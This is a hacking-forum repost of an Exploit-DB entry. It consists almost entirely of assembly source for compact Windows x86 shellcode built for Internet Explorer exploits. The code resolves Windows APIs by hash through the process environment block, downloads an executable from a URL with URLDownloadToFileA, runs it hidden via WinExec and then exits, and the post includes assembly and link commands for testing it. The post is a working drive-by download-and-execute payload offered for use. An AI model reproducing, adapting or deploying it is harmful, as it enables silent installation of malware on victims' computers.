Exploit Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13517
Проверка EDB
  1. Пройдено
Автор
WEISS
Тип уязвимости
SHELLCODE
Платформа
WINDOWS_X86
CVE
N/A
Дата публикации
2007-06-14
Код:
;
; relocateable dynamic runtime assembly code example using hash lookup *** for IE exploits only ***
; the URLMON.DLL must already be loaded into the process space for this to work, so do not run on its own!!
;
; to test use /DTEST_CODE in ml command line
;
; URLDownLoadToFileA() / WinExec() / ExitProcess() | ExitThread()
;
; 124 bytes
;
; for testing:
;
; ml /c /coff /Cp /DTEST_CODE dexec32.asm
; link /subsystem:windows /section:.text,w dexec32.obj urlmon.lib
;
; wyse101 [at] gmail.com
;
; March 2007
;
      .386
      .model flat,stdcall

      ROL_CONSTANT equ 5

      mrol macro iNum:req,iBits:req
           exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
      endm

      mror macro iNum:req,iBits:req
           exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
      endm

      hashapi macro szApi
              local dwApi

              dwApi = 0

              forc x,szApi
                   dwApi = dwApi + '&x'
                   dwApi = mrol(dwApi,ROL_CONSTANT)
              endm
              dwApi = mrol(dwApi,ROL_CONSTANT)
              dw (dwApi and 0ffffh)
      endm

      .code

      assume fs:nothing

code_start:
      jmp load_data
IFDEF TEST_CODE
extern URLDownloadToFileA   :proc
      call URLDownloadToFileA                     ; included when assembled with /DTEST_CODE
ENDIF
setup_parameters:
      pop edi                                     ; offset @cmd_start
      xor eax,eax                                 ; eax = 0
      cdq                                         ; edx = 0
      ; ********************************************************************
      push eax                                    ; exit code  = 0
      ; ********************************************************************
      push eax                                    ; SW_HIDE
      mov dl,(@cmd_end-@cmd_start)-1              ; this allows command up to 255 bytes
      push edi                                    ; file name to execute
      ; ********************************************************************
      push eax                                    ; callback routine URLDownLoadToFileA
      push eax                                    ; reserved, must be zero
      push edi                                    ; file name to save as
      add edi,edx                                 ; get offset of @url_start-1
      stosb                                       ; zero tail end
      mov dl,(@url_end-@url_start)-1              ; limit of 255 bytes for url
      push edi                                    ; url to download file from
      push eax                                    ; interface
      add edi,edx                                 ; get offset of @urlmon-1
      stosb                                       ; zero tail end of url
      ; *********************************************************************
load_modules:
      push edi                   ; save current offset to hashes
      push 30h
      pop ecx
      mov eax,fs:[ecx]           ; PEB base address
      mov eax,[eax+0ch]          ; PEB_LDR_DATA LoaderData
      mov ebp,[eax+1ch]          ; LIST_ENTRY InMemoryOrderModuleList
scan_dll:
      mov ebx,[ebp+8]            ; DllBase
      mov ebp,[ebp]              ; Flink
      push ebp                   ; save

      mov eax,[ebx+3ch]
      mov eax,[ebx+eax+78h]	 ; IMAGE_DIRECTORY_ENTRY_EXPORT
      lea esi,[ebx+eax+18h]	 ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames
      lodsd
      xchg eax,ecx               ; ecx = NumberOfNames
      
      lodsd
      add eax,ebx                ; AddressOfFunctions
      push eax

      lodsd
      lea edi,[eax+ebx]          ; AddressOfNames

      lodsd
      lea ebp,[eax+ebx]		 ; ebp = AddressOfNameOrdinals
load_api:
      mov esi,[edi+4*ecx-4]
      add esi,ebx
      xor eax,eax
      cdq
hash_api:
      lodsb
      add edx,eax
      rol edx,ROL_CONSTANT
      dec eax
      jns hash_api

      mov esi,[esp+8]                             ; get api hashes
      cmp dx,word ptr[esi]                        ; found a match?
      je call_api

      loop load_api
      pop eax                                     ; check
      pop ebp                                     ;
      jmp scan_dll
call_api:
      pop eax
      movzx edx,word ptr [ebp+2*ecx-2]
      add ebx,[eax+4*edx]
      pop ebp                                     ; modules
      pop edi                                     ; api hashes
      call ebx                                    ; call api
      stosw                                       ; advance 2 bytes to next hash
      jmp load_modules                             ; do another, just keep going until ExitProcess is reached.
      ; *************************
load_data:
      call setup_parameters
@cmd_start:
      db 'file.exe',0ffh                          ; WinExec("file.exe",SW_HIDE);
@cmd_end:
@url_start:
      db 'http://127.0.0.1/file.exe',0ffh         ; url of file to download
@url_end:
      hashapi <URLDownloadToFileA>
      hashapi <WinExec>
      hashapi <ExitProcess>
      ; *********************************************************************

end code_start

; milw0rm.com [2007-06-14]
 
Источник
www.exploit-db.com

Похожие темы